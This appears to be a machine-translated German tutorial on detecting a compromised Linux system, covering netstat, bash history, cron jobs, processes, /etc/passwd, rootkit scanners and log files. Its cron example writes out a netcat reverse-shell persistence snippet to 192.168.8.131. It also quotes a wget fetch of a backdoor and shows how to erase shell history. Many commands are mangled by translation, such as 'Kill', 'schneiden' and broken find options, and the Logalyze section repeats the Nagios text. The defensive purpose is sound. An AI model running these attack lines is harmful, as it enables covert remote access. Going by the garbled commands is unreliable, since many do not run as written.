So bestimmen Sie, ob ein Linux -System beeinträchtigt ist

Frederik Rodehau
So bestimmen Sie, ob ein Linux -System beeinträchtigt ist
Es gibt viele Gründe, warum ein Hacker seinen Weg in Ihr System wirbt und Ihre ernsthaften Probleme verursachen würde. Vor Jahren war es vielleicht, die Fähigkeiten zu zeigen, aber heutzutage können die Absichten hinter solchen Aktivitäten viel komplizierter sein, wenn das Opfer viel weitreichendere Konsequenzen für das Opfer hat. Dies mag offensichtlich klingen, aber nur weil „alles in Ordnung scheint“ bedeutet dies nicht, dass alles in Ordnung ist. Hacker könnten in Ihr System eindringen, ohne es mit Malware zu wissen und infizieren, um die volle Kontrolle zu übernehmen, und sogar für die laterale Bewegung zwischen Systemen. Die Malware kann im System versteckt werden und dient als Hintertür- oder Befehls- und Steuerungssystem, damit Hacker böswillige Aktivitäten auf Ihrem System ausführen können.Es ist besser, in Sicherheit zu sein als leid. Möglicherweise erkennen Sie nicht sofort, dass Ihr System gehackt wurde, aber es gibt einige Möglichkeiten, wie Sie feststellen können, ob Ihr System beeinträchtigt ist. In diesem Artikel wird erläutert, wie Sie feststellen können, ob Ihre Linux Das System wurde von einer nicht autorisierten Person oder einem Bot kompromittiert, um böswillige Aktivitäten durchzuführen.

Netstat

NetStat ist ein wichtiges TCP/IP-Netzwerk-Dienstprogramm für Befehlszeilen, das Informationen und Statistiken über die Verwendung von Protokollen und aktive Netzwerkverbindungen bereitstellt.

Wir werden verwenden Netstat Auf einem Beispiel -Opfermaschine über den folgenden Befehl nach etwas Verdächtigem in den aktiven Netzwerkverbindungen:

Ubuntu@Ubuntu: ~ $ netstat -antp

Hier sehen wir alle aktuell aktiven Verbindungen. Jetzt werden wir nach einem suchen Verbindung, die nicht da sein sollte.

Hier ist es eine aktive Verbindung am Port 44999 (Ein Port, der nicht geöffnet sein sollte).Wir können andere Details zur Verbindung sehen, wie z. B. die PID, und der Programmname, der in der letzten Spalte ausgeführt wird. In diesem Fall die PID Ist 1555 und die böswillige Nutzlast, die es ausführt, ist die ./Hülse.Elf Datei.

Ein weiterer Befehl, der nach den derzeit zuhörenden und aktiven Ports auf Ihrem System checkt, ist wie folgt:

Ubuntu@Ubuntu: ~ $ netstat -la

Dies ist eine ziemlich unordentliche Ausgabe. Um die Hör- und etablierten Verbindungen herauszufiltern, verwenden wir den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ netstat -la | Grep "Hören Sie" "etabliert"

Dies gibt Ihnen nur die Ergebnisse, die für Sie wichtig sind, damit Sie diese Ergebnisse leichter sortieren können. Wir können eine aktive Verbindung auf sehen Port 44999 In den obigen Ergebnissen.

Nachdem Sie den böswilligen Prozess erkannt haben, können Sie den Prozess durch folgende Befehle abtöten. Wir werden die bemerken PID des Prozesses unter Verwendung des Befehls netstat und töten Sie den Prozess über den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ Kill 1555

~.Bash-History

Linux hält einen Datensatz, von dem Benutzer sich in das System angemeldet haben, von welchem ​​IP, wann und wie lange.

Sie können auf diese Informationen mit dem zugreifen zuletzt Befehl. Die Ausgabe dieses Befehls wäre wie folgt:

Ubuntu@Ubuntu: ~ $ letztes

Die Ausgabe zeigt den Benutzernamen in der ersten Spalte, das Terminal in der zweiten, die Quelladresse in der dritten, die Anmeldezeit in der vierten Spalte und die Gesamtsitzungszeit in der letzten Spalte. In diesem Fall die Benutzer Usman Und Ubuntu sind immer noch angemeldet. Wenn Sie eine Sitzung sehen, die nicht autorisiert ist oder böswillig aussieht, lesen Sie den letzten Abschnitt dieses Artikels.

Die Protokollierungsgeschichte wird in gespeichert ~.Bash-History Datei. Die Geschichte kann also leicht entfernt werden, indem die löscht .Bash-History Datei. Diese Aktion wird häufig von Angreifern ausgeführt, um ihre Spuren abzudecken.

Ubuntu@Ubuntu: ~ $ cat .bash_history

In diesem Befehl werden die auf Ihrem System ausgeführten Befehle angezeigt, wobei der neueste Befehl unten auf der Liste ausgeführt wird.

Die Geschichte kann über den folgenden Befehl gelöscht werden:

Ubuntu@Ubuntu: ~ $ History -c

Dieser Befehl löscht den Verlauf nur aus dem Terminal, das Sie derzeit verwenden. Es gibt also eine korrektere Möglichkeit, dies zu tun:

Ubuntu@Ubuntu: ~ $ cat/dev/null> ~//.bash_history

Dadurch wird der Inhalt des Verlaufs gelöscht, hält die Datei jedoch an Ort und Stelle. Wenn Sie also nur Ihr aktuelles Login sehen, nachdem Sie das ausgeführt haben zuletzt Befehl, dies ist überhaupt kein gutes Zeichen. Dies weist darauf hin, dass Ihr System möglicherweise kompromittiert wurde und der Angreifer die Geschichte wahrscheinlich gelöscht hat.

Wenn Sie einen böswilligen Benutzer oder IP vermuten, melden Sie sich als dieser Benutzer an und führen Sie den Befehl aus Geschichte, folgendermaßen:

Ubuntu@Ubuntu: ~ $ su
Ubuntu@Ubuntu: ~ $ Geschichte

In diesem Befehl wird der Befehlsgeschichte angezeigt, indem die Datei gelesen wird .Bash-History im /heim Ordner dieses Benutzers. Suchen Sie sorgfältig nach wget, Locken, oder netcat Befehle, falls der Angreifer diese Befehle zum Übertragen von Dateien oder zur Installation von Repo-Tools wie Crypto-Miners oder Spam-Bots verwendete.

Schauen Sie sich das Beispiel unten an:

Oben können Sie den Befehl sehen WGet https: // github.com/sajith/mod-rootme.In diesem Befehl versuchte der Hacker, mithilfe einer Repo -Datei auf eine Repo -Datei zuzugreifen wget So laden Sie eine Hintertür mit dem Namen "Mod-Root Me" herunter und installieren Sie ihn auf Ihrem System. Dieser Befehl in der Geschichte bedeutet, dass das System kompromittiert und von einem Angreifer zurückgegriffen wurde.

Denken Sie daran, diese Datei kann handlich ausgewiesen oder ihre Substanz erzeugt werden. Die durch diesen Befehl angegebenen Daten dürfen nicht als eindeutige Realität angesehen werden. In dem Fall, dass der Angreifer einen „schlechten“ Befehl gab und es versäumt hat, die Geschichte zu evakuieren, wird er dort sein.

Zeitgesteuerte Aufgaben

Cron -Jobs können als wichtiges Werkzeug dienen, wenn sie so konfiguriert werden. Das Bearbeiten von Cron Jobs ist eine wichtige Fähigkeit, und so zu wissen, wie man sie sieht.

Um die für den aktuellen Benutzer ausgeführten Cron -Jobs anzuzeigen, verwenden wir den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ crontab -l

Um die Cron -Jobs anzuzeigen, die für einen anderen Benutzer ausgeführt werden (in diesem Fall Ubuntu), verwenden wir den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ crontab -u Ubuntu -l

Um die täglichen, stündlichen, wöchentlichen und monatlichen Cron -Jobs zu sehen, werden wir folgende Befehle verwenden:

Tägliche Cron -Jobs:

Ubuntu@Ubuntu: ~ $ ls -la /etc /cron.täglich

Stündliche Cron -Jobs:

Ubuntu@Ubuntu: ~ $ ls -la /etc /cron.stündlich

Wöchentliche Cron -Jobs:

Ubuntu@Ubuntu: ~ $ ls -la /etc /cron.wöchentlich

Nehmen Sie ein Beispiel:

Der Angreifer kann einen Cron -Job einsetzen /etc/crontab Das läuft eine böswillige Kommando 10 Minuten nach jeder Stunde. Der Angreifer kann auch einen böswilligen Service oder eine Rückseite der Back -Shell -Hintertür über durchführen netcat oder ein anderer Dienstprogramm. Wenn Sie den Befehl ausführen $ ~ crontab -l, Sie werden sehen, wie ein Cron -Job unter:

Ubuntu@Ubuntu: ~ $ crontab -l
CT = $ (Crontab -l)
Ct = $ ct $ '\ n10 * * * * nc -e /bin /bash 192.168.8.131 44999 '
printf "$ ct" | Crontab -
PS Aux

Um ordnungsgemäß zu überprüfen, ob Ihr System kompromittiert wurde, ist es auch wichtig, laufende Prozesse anzusehen. Es gibt Fälle, in denen einige nicht autorisierte Prozesse nicht genügend CPU -Nutzung konsumieren, um in der aufgeführt zu werden Spitze Befehl. Hier werden wir die verwenden ps Befehl, alle aktuell ausgeführten Prozesse anzuzeigen.

Ubuntu@Ubuntu: ~ $ PS Auxf

Die erste Spalte zeigt den Benutzer an, die zweite Spalte zeigt eine eindeutige Prozess -ID an, und die CPU- und Speicherverbrauch werden in den nächsten Spalten angezeigt.

Diese Tabelle bietet Ihnen die meisten Informationen. Sie sollten jeden laufenden Prozess untersuchen, um nach etwas Besonderem zu suchen, um zu wissen, ob das System beeinträchtigt ist oder nicht. Für den Fall, dass Sie etwas Verdächtiges finden, googeln Sie es oder führen Sie es mit dem aus LSOF Befehl, wie oben gezeigt. Dies ist eine gute Angewohnheit zu rennen ps Befehle auf Ihrem Server und es erhöht Ihre Chancen, etwas Verdächtiges oder aus Ihrem täglichen Routine herauszufinden.

/etc/passwd

Der /etc/passwd Die Datei verfolgt jeden Benutzer im System. Dies ist eine dicker getrennte Datei mit Informationen wie Benutzername, BenutzerID, verschlüsselt.

Wenn ein Angreifer in Ihr System hackt, besteht die Möglichkeit, dass er oder sie weitere Benutzer erstellt, um die Dinge getrennt zu halten oder eine Hintertür in Ihrem System zu erstellen, um mit dieser Hintertür wieder zu erreichen. Während Sie überprüfen, ob Ihr System kompromittiert wurde, sollten Sie auch jeden Benutzer in der Datei /etc /passwd überprüfen. Geben Sie dazu den folgenden Befehl ein:

Ubuntu@Ubuntu: ~ $ cat etc/passwd

Dieser Befehl gibt Ihnen eine ähnliche Ausgabe wie unten:

Gnome-initial-Setup: x: 120: 65534 ::/run/gnome-initial-setup/:/bin/false
GDM: X: 121: 125: GNOME Display Manager:/var/lib/gdm3:/bin/false
Usman: x: 1000: 1000: Usman:/home/usman:/bin/bash
Postgres: x: 122: 128: postgresql Administrator ,,,:/var/lib/postgresql:/bin/bash
Debian-tor: x: 123: 129 ::/var/lib/tor:/bin/false
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
LightDM: x: 125: 132: Light Display Manager:/var/lib/lightDM:/bin/false
Debian-Gdm: X: 124: 131: Gnome Display Manager:/var/lib/gdm3:/bin/false
Anonymous: x: 1002: 1002: ,,,,:/home/anonymous:/bin/bash

Jetzt möchten Sie nach jedem Benutzer suchen, von dem Sie sich nicht bewusst sind. In diesem Beispiel sehen Sie einen Benutzer in der Datei mit dem Namen „Anonymous.Eine weitere wichtige Sache, die zu beachten ist, ist, dass der Benutzer, wenn der Angreifer einen Benutzer zum Anmelden erstellt hat, auch eine "/bin/bash" -Schell zugewiesen hat. Sie können also Ihre Suche eingrenzen, indem Sie die folgende Ausgabe ausgraben:

Ubuntu@Ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash"
Usman: x: 1000: 1000: Usman:/home/usman:/bin/bash
Postgres: x: 122: 128: postgresql Administrator ,,,:/var/lib/postgresql:/bin/bash
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
Anonymous: x: 1002: 1002: ,,,,:/home/anonymous:/bin/bash

Sie können weitere „Bash -Magie“ durchführen, um Ihre Ausgabe zu verfeinern.

Ubuntu@Ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash" | schneiden -d ":" -f 1
Usman
Postgres
Ubuntu
anonym

Finden

Zeitbasierte Suchanfragen sind nützlich für schnelle Triage. Der Benutzer kann auch die Datei ändern, die Zeitstempel ändern. Um die Zuverlässigkeit zu verbessern, geben Sie CTime in die Kriterien ein, da es viel schwieriger ist, sich zu manipulieren, da es Änderungen einiger Level -Dateien erfordert.

Sie können den folgenden Befehl verwenden, um Dateien zu finden, die in den letzten 5 Tagen erstellt und geändert wurden:

Ubuntu@Ubuntu: ~ $ find / -mtime -o -ctime -5

Um alle SUID -Dateien zu finden, die dem Root gehören, und um zu überprüfen, ob unerwartete Einträge in den Listen vorhanden sind, verwenden wir den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ find / -perm -4000 -User -Root -Typ F

Um alle SGID -Dateien (Set User ID) zu finden, die dem Stamm sind, und zu überprüfen, ob unerwartete Einträge in den Listen vorhanden sind, verwenden wir den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ find / -perm -6000 -Typ f f

Chkrootkit

Rootkits sind eines der schlimmsten Dinge, die mit einem System passieren können und einer der gefährlichsten Angriffe sind, gefährlicher als Malware und Viren, sowohl in dem Schaden, den sie dem System verursachen, als auch Schwierigkeiten bei der Suche und Erkennung.

Sie sind so gestaltet, dass sie verborgen bleiben und böswillige Dinge wie Diebstahl von Kreditkarten und Online -Banking -Informationen erledigen. Rootkits Geben Sie Cyberkriminellen die Möglichkeit, Ihr Computersystem zu steuern. RootKits helfen dem Angreifer auch, Ihre Tastenanschläge zu überwachen und Ihre Antiviren -Software zu deaktivieren, was es noch einfacher macht, Ihre privaten Informationen zu stehlen.

Diese Art von Malware kann lange in Ihrem System bleiben, ohne dass der Benutzer es einmal bemerkt, und kann schwerwiegende Schäden verursachen. Einmal der Rootkit Es wird erkannt, es gibt keinen anderen Weg, als das gesamte System neu zu installieren. Manchmal können diese Angriffe sogar Hardwarefehler verursachen.

Zum Glück gibt es einige Tools, die zur Erkennung helfen können Rootkits Auf Linux -Systemen wie Lynis, Clam AV oder LMD (Linux Malware Detect). Sie können Ihr System auf Bekannte überprüfen Rootkits Verwenden Sie die folgenden Befehle.

Installieren Sie zuerst Chkrootkit über den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ sudo APT Installieren Sie Chkrootkit

Dadurch wird die installiert Chkrootkit Werkzeug. Mit diesem Tool können Sie über den folgenden Befehl nach RootKits überprüfen:

Ubuntu@Ubuntu: ~ $ sudo chkrootkit

Das Chkrootkit -Paket besteht aus einem Shell -Skript, das Systembinärdateien für Rootkit -Änderungen sowie mehrere Programme überprüft, die nach verschiedenen Sicherheitsproblemen suchen. Im obigen Fall wurde das Paket auf ein Zeichen von Rootkit im System überprüft und fand keine. Nun, das ist ein gutes Zeichen!

Linux -Protokolle

Linux -Protokolle geben einen Zeitplan für Ereignisse im Linux -Arbeitsbereich und im Linux. Die primäre Aufgabe, die ein Administrator ausführen muss, wenn er oder sie herausfindet, dass das System beeinträchtigt ist.

Bei expliziten Problemen bei Arbeitsbereichsanwendungen werden die Protokolldatensätze mit verschiedenen Bereichen in Verbindung gehalten. Zum Beispiel komponiert Chrome Crashmeldungen an Absturzberichte '~/.Chrom-/Crash -Berichte '), Wenn eine Arbeitsbereichsanwendung auf dem Ingenieur angewiesen ist und angezeigt wird, ob die Anwendung benutzerdefinierte Protokollanordnung berücksichtigt. Aufzeichnungen sind in der/var/log Verzeichnis. Es gibt Linux -Protokolle für alles: Framework, Portion, Bündel Chiefs, Startformulare, Xorg, Apache und MySQL. In diesem Artikel konzentriert sich das Thema explizit auf Linux -Framework -Protokolle.

Sie können diesen Katalog mithilfe der Vertragsdiskorienreihenfolge in diesen Katalog ändern. Sie sollten Root -Berechtigungen haben, um Protokolldateien anzuzeigen oder zu ändern.

Ubuntu@Ubuntu: ~ $ cd /var /log

Anweisungen zum Anzeigen von Linux -Protokollen

Verwenden Sie die folgenden Befehle, um die erforderlichen Protokolldokumente anzuzeigen.

Linux -Protokolle sind mit dem Befehl zu sehen CD /var /log, An diesem Punkt, indem Sie die Reihenfolge komponieren, um die Protokolle unter diesem Katalog zu sehen. Eines der bedeutendsten Protokolle ist die Syslog, welche viele wichtige Protokolle protokolliert.

Ubuntu@Ubuntu: Katzensyslog

Um die Ausgabe zu sanieren, werden wir die “verwenden“weniger" Befehl.

Ubuntu@Ubuntu: Cat Syslog | weniger

Geben Sie den Befehl ein var/log/syslog Einige Dinge unter dem sehen Syslog -Datei. Die Fokussierung auf ein bestimmtes Problem wird einige Zeit dauern, da dieser Datensatz normalerweise lang ist. Drücken.”

Sie können die Protokolle ebenfalls mithilfe von DMESG sehen, die den Teilringunterstützung druckt. Diese Funktion druckt alles und sendet Sie so weit wie möglich entlang des Dokuments. Ab diesem Zeitpunkt können Sie die Reihenfolge nutzen dmesg | weniger durch den Ertrag zu schauen. In dem Fall, dass Sie die Protokolle für den gegebenen Benutzer sehen müssen, müssen Sie den folgenden Befehl ausführen:

dmesg - facility = user

Zusammenfassend können Sie die Heckreihenfolge verwenden, um die Protokolldokumente anzuzeigen. Es ist ein winziges, aber nützliches Dienstprogramm, das man verwenden kann, da es verwendet wird, um den letzten Teil der Protokolle anzuzeigen, in dem das Problem höchstwahrscheinlich aufgetreten ist. Sie können auch die Anzahl der letzten Bytes oder Zeilen angeben, die im Schwanzbefehl angezeigt werden können. Verwenden Sie dazu den Befehl Schwanz/var/log/syslog. Es gibt viele Möglichkeiten, Protokolle zu betrachten.

Geben Sie für eine bestimmte Anzahl von Zeilen (das Modell berücksichtigt die letzten 5 Zeilen) den folgenden Befehl ein:

Ubuntu@Ubuntu: ~ $ Tail -f -n 5/var/log/syslog

Dadurch werden die neuesten 5 Zeilen gedruckt. Wenn eine andere Linie kommt, wird der erstere evakuiert. Drücken Sie Strg+x, um von der Schwanzbestellung wegzukommen.

Wichtige Linux -Protokolle

Die primären vier Linux -Protokolle umfassen:

  1. Anwendungsprotokolle
  2. Ereignisprotokolle
  3. Serviceprotokolle
  4. Systemprotokolle
Ubuntu@Ubuntu: Cat Syslog | weniger
  • /var/log/syslog oder /var/log/message: Allgemeine Nachrichten, genau wie Framework -verwandte Daten. Dieses Protokoll speichert alle Aktionsinformationen über den weltweiten Framework.
Ubuntu@Ubuntu: Cat Auth.Protokoll | weniger
  • /var/log/auth.Protokoll oder /var/log/sicher: Speichern Sie Überprüfungsprotokolle, einschließlich effektiver und gesprengter Anmeldungen und Validierungsstrategien. Debian und Ubuntu verwenden /var/log/auth.Protokoll Lagern Sie Anmeldeversuche, während Redhat und CentOS verwenden /var/log/sicher Authentifizierungsprotokolle speichern.
Ubuntu@Ubuntu: Katzenstiefel.Protokoll | weniger
  • /var/log/boot.Protokoll: Enthält Informationen zum Booting und Nachrichten während des Starts.
Ubuntu@Ubuntu: Cat Mailog | weniger
  • /var/log/Mailog oder /var/log/mail.Protokoll: Speichert alle mit Mail -Servern identifizierten Protokolle. wertvoll, wenn Sie Daten zu Postfix, SMTPD oder E-Mail-bezogenen Verwaltungen benötigen, die auf Ihrem Server ausgeführt werden.
Ubuntu@Ubuntu: Katzenkern | weniger
  • /var/log/kern: Enthält Informationen zu Kernel -Protokollen. Dieses Protokoll ist wichtig für die Untersuchung benutzerdefinierter Teile.
Ubuntu@Ubuntu: Cat Dmesg | weniger
  • /var/log/dmesg: Enthält Nachrichten, die Gadget -Treiber identifizieren. Die Order DMESG kann verwendet werden, um Nachrichten in diesem Datensatz anzuzeigen.
Ubuntu@Ubuntu: Cat Faillog | weniger
  • /var/log/faillog: Enthält Daten zu allen gesprengten Anmeldeversuchen, die für die Aufnahme von Wissen über versuchte Sicherheitsdurchdringungen wertvoll sind. Zum Beispiel diejenigen, die Anmeldezertifizierungen hacken wollen, genau wie Angriffe an Tierkraft.
Ubuntu@Ubuntu: Cat Cron | weniger
  • /var/log/cron: speichert alle cron-bezogenen Nachrichten; Zum Beispiel Cron -Beschäftigungen oder als der Cron -Daemon eine Berufung, verwandte Enttäuschungsnachrichten usw. begann und so weiter.
Ubuntu@Ubuntu: Cat Yum.Protokoll | weniger
  • /var/log/yum.Protokoll: Wenn Sie die Chance haben, dass Sie Bündel mithilfe der YUM -Reihenfolge einführen, speichert dieses Protokoll alle verwandten Daten. Dies kann bei der Entscheidung hilfreich sein, ob ein Bündel und alle Segmente effektiv eingeführt wurden.
Ubuntu@Ubuntu: Cat httpd | weniger
  • /var/log/httpd/oder/var/log/apache2: Diese beiden Verzeichnisse werden verwendet, um alle Arten von Protokollen für einen Apache -HTTP -Server zu speichern, einschließlich Zugriffsprotokolle und Fehlerprotokolle. Die Datei "ERROR_LOG" enthält alle schlechten Anforderungen, die vom HTTP -Server empfangen werden. Diese Fehler beinhalten Speicherprobleme und andere Framework-Fehlern. Der Access_log enthält einen Datensatz aller über HTTP empfangenen Anfragen.
Ubuntu@Ubuntu: Cat Mysqld.Protokoll | weniger
  • /var/log/mysqld.Protokoll oder/var/log/mysql.Protokoll : Das MySQL -Protokolldokument, in dem alle Fehler, Debugg- und Erfolgsnachrichten angegeben werden. Dies ist ein weiteres Ereignis, bei dem der Rahmen zur Registrierung leitet. Redhat, CentOS, Fedora und andere Redhat-basierte Frameworks Nutzung/var/log/mySQLD.Protokollieren, während Debian/Ubuntu die/var/log/mySQL verwenden.Protokollkatalog.

Tools zum Anzeigen von Linux -Protokollen

Es sind heute viele Open -Source -Protokoll -Tracker und Prüfungsgeräte zugänglich, so. Die kostenlosen und Open -Source -Protokollprüfer können an jedem System arbeiten, um die Aufgabe zu erledigen. Hier sind fünf der besten, die ich in der Vergangenheit verwendet habe, in keiner bestimmten Reihenfolge.

  • Graylog

Graylog wurde 2011 in Deutschland begonnen und wird derzeit entweder als Open -Source -Gerät oder als Geschäftsanordnung angeboten. Graylog soll ein rundes, protokolliertes Framework sein, das Informationsströme von verschiedenen Servern oder Endpunkten empfängt und Sie ermöglicht, diese Daten schnell zu durchwenden oder zu zerstören.

Graylog hat aufgrund seiner Einfachheit und Vielseitigkeit eine positive Bekanntheit unter den Rahmenköpfen zusammengestellt. Die meisten Webunternehmen beginnen wenig, können sich jedoch exponentiell entwickeln. Graylog kann Stapel an einem System von Backend -Servern anpassen und jeden Tag ein paar Terabyte Protokollinformationen verarbeiten.

Es wird vorläuft. Graylog arbeitet um die Idee von Dashboards, mit der Benutzer die Art von Messungen oder Informationsquellen auswählen können, die sie nach einiger Zeit wichtige Steigungen finden, die sie schnell beobachten und schnell beobachten.

Wenn eine Sicherheits- oder Ausführungs -Episode auftritt. Die Suchfunktion von Graylog macht diese Aufgabe einfach. Dieses Tool hat bei der Anpassung an interne Fehler gearbeitet.

  • Nagios

Nagios wurde 1999 von einem einzigen Entwickler begonnen und hat seitdem in eines der soliden Open -Source -Instrumente für die Überwachung der Protokollinformationen eingebaut. Die vorliegende Wiedergabe von Nagios kann in Servern implementiert werden, die jede Art von Betriebssystem ausführen (Linux, Windows usw.).

Das wesentliche Element von Nagios ist ein Protokollserver, das das Informationsortiment optimiert und den Rahmenbedingungen schrittweise zur Verfügung stellt. Der Nagios-Protokollservermotor fängt Informationen allmählich an und versorgt sie in ein bahnbrechendes Suchinstrument. Die Einbeziehung mit einem anderen Endpunkt oder einer anderen Anwendung ist eine einfache Trinkgeld für diesen Assistenten der inhärenten Anordnung.

Nagios wird häufig in Assoziationen verwendet, die die Sicherheit ihrer Nachbarschaften untersuchen müssen, und können einen Umfang systembezogener Anlässe überprüfen. Nagios können so programmiert werden, dass bestimmte Aufgaben erfüllt werden, wenn ein bestimmter Zustand erfüllt ist, sodass Benutzer Probleme noch vor dem Einbeziehung der Bedürfnisse eines Menschen erkennen können.

Als Hauptaspekt der Bewertung der Systeme wird Nagios Protokollinformationen kanalisieren, die von dem geografischen Bereich abhängen, in dem es beginnt. Komplette Dashboards mit Mapping Innovation können implementiert werden, um das Streaming des Webverkehrs zu sehen.

  • Logalyz

Logalyze produziert Open-Source-Tools für Framework-Direktoren oder Sys-Administratoren und Sicherheitsspezialisten, um sie bei den Überwachungsserverprotokollen zu unterstützen und sich darauf zu konzentrieren, die Protokolle in wertvolle Informationen umzuwandeln. Das wesentliche Element dieses Tools ist, dass es als kostenlosen Download für Zuhause oder für die Geschäftsanwendung zugänglich ist.

Das wesentliche Element von Nagios ist ein Protokollserver, das das Informationsortiment optimiert und den Rahmenbedingungen schrittweise zur Verfügung stellt. Der Nagios-Protokollservermotor fängt Informationen allmählich an und versorgt sie in ein bahnbrechendes Suchinstrument. Die Einbeziehung mit einem anderen Endpunkt oder einer anderen Anwendung ist eine einfache Trinkgeld für diesen Assistenten der inhärenten Anordnung.

Nagios wird häufig in Assoziationen verwendet, die die Sicherheit ihrer Nachbarschaften untersuchen müssen, und können einen Umfang systembezogener Anlässe überprüfen. Nagios können so programmiert werden, dass bestimmte Aufgaben erfüllt werden, wenn ein bestimmter Zustand erfüllt ist, sodass Benutzer Probleme noch vor dem Einbeziehung der Bedürfnisse eines Menschen erkennen können.

Als Hauptaspekt der Bewertung der Systeme wird Nagios Protokollinformationen kanalisieren, die von dem geografischen Bereich abhängen, in dem es beginnt. Komplette Dashboards mit Mapping Innovation können implementiert werden, um das Streaming des Webverkehrs zu sehen.

Was sollten Sie tun, wenn Sie kompromittiert wurden??

Die Hauptsache ist nicht in Panik, insbesondere wenn die nicht autorisierte Person derzeit signiert ist. Sie sollten die Möglichkeit haben, die Kontrolle über die Maschine zurückzuerobern, bevor die andere Person weiß, dass Sie davon Bescheid wissen. Für den Fall, dass sie wissen, dass Sie sich ihrer Anwesenheit bewusst sind, kann der Angreifer Sie möglicherweise von Ihrem Server fernhalten und Ihr System zerstören. Wenn Sie nicht so technisch sind, müssen Sie nur den gesamten Server sofort abschalten. Sie können den Server über die folgenden Befehle herunterladen:

Ubuntu@Ubuntu: ~ $ schaltdown -h jetzt

Oder

Ubuntu@Ubuntu: ~ $ SystemCTL Poweroff

Eine andere Möglichkeit, dies zu tun. Sobald der Server ausgeschaltet ist, können Sie an den benötigten Firewall -Regeln arbeiten und sich mit jedem um Unterstützung in Ihrer eigenen Zeit wenden.

Falls Sie sich selbstbewusster fühlen und Ihr Hosting -Anbieter über eine vorgelagerte Firewall verfügt, erstellen und aktivieren Sie dann nach zwei Regeln:

  • Erlauben Sie SSH -Verkehr nur von Ihrer IP -Adresse aus.
  • Blockieren Sie alles andere, nicht nur SSH, sondern jedes Protokoll, das an jedem Port ausgeführt wird.

Verwenden Sie den folgenden Befehl, um nach aktiven SSH -Sitzungen zu überprüfen:

Ubuntu@Ubuntu: ~ $ SS | Grep Ssh

Verwenden Sie den folgenden Befehl, um ihre SSH -Sitzung zu töten:

Ubuntu@Ubuntu: ~ $ Kill

Dadurch wird ihre SSH -Sitzung getötet und Ihnen Zugriff auf den Server erhalten. Falls Sie keinen Zugriff auf eine vorgelagerte Firewall haben, müssen Sie die Firewall -Regeln auf dem Server selbst erstellen und aktivieren. Wenn dann die Firewall -Regeln eingerichtet sind, töten Sie die SSH -Sitzung des nicht autorisierten Benutzers über den Befehl "Kill".

Eine letzte Technik, soweit verfügbar, melden Sie sich mithilfe einer außerhalb des Bandes, z. B. einer seriellen Konsole, beim Server an. Stoppen Sie alle Netzwerke über den folgenden Befehl:

Ubuntu@Ubuntu: ~ $ SystemCTL STOP -Netzwerk.Service

Dadurch wird jedes System, das zu Ihnen kommt.

Sobald Sie die Kontrolle über den Server wiedererlangt haben, vertrauen Sie ihm nicht leicht. Versuchen Sie nicht, die Dinge zu reparieren und sie wiederverwenden. Was kaputt ist, kann nicht festgelegt werden. Sie würden nie wissen, was ein Angreifer tun könnte, und Sie sollten also nie sicher sein, dass der Server sicher ist. Die Neuinstallation sollte also Ihr Abschluss sein.

Sqlite
So herunterladen und installieren Sie SQLite -Tools?
SQLite ist ein weit verbreitetes, leichtes und effizientes Datenbankverwaltungssystem, das Sie einfa...
Christopher Lammert
Php
Wie man Pause benutzt und in PHP fortgesetzt wird?
In PHP wird die Break -Anweisung verwendet, um eine Schleife oder eine Schaltanweisung zu beenden, w...
Mohamed Flore
Php
Warum PHP in der Webentwicklung verwendet werden sollte
PHP ist eine gute Wahl für die Webentwicklung aufgrund seiner Einfachheit, Flexibilität, Geschwindig...
Hussein Burkhard
Python
Pandas explodieren mehrere Spalten
Jessica Schimmer
Windows OS
Was ist der Unterschied zwischen Windows Top 10 Home und Pro
Kaya Wyludda
R
So erstellen Sie einen leeren Datenrahmen r
Mohamed Flore
Sqlite
So verwenden Sie SQLite Viewer Web App
Hussein Burkhard
JavaScript
So verwenden Sie die MouseEvent ScreenX -Eigenschaft in JavaScript
Jessica Schimmer
JavaScript
Was macht W Metacharacter in Regexp von JavaScript?
Fr. Chris Frisch
Php
Was ist ein undefinierter Indexfehler in PHP und wie man ihn behebt??
Christopher Lammert
Oracle -Datenbank
Mit SQL Developer können Sie eine Verbindung zu Oracle Database Top 10C herstellen?
Kaya Wyludda
AWS
Was ist AWS -Steuerturm und wie man ihn benutzt??
Gian Eisenlauer
AWS
Was ist elastische Bohnenstange? Ist es PaaS oder IaaS?
Gian Eisenlauer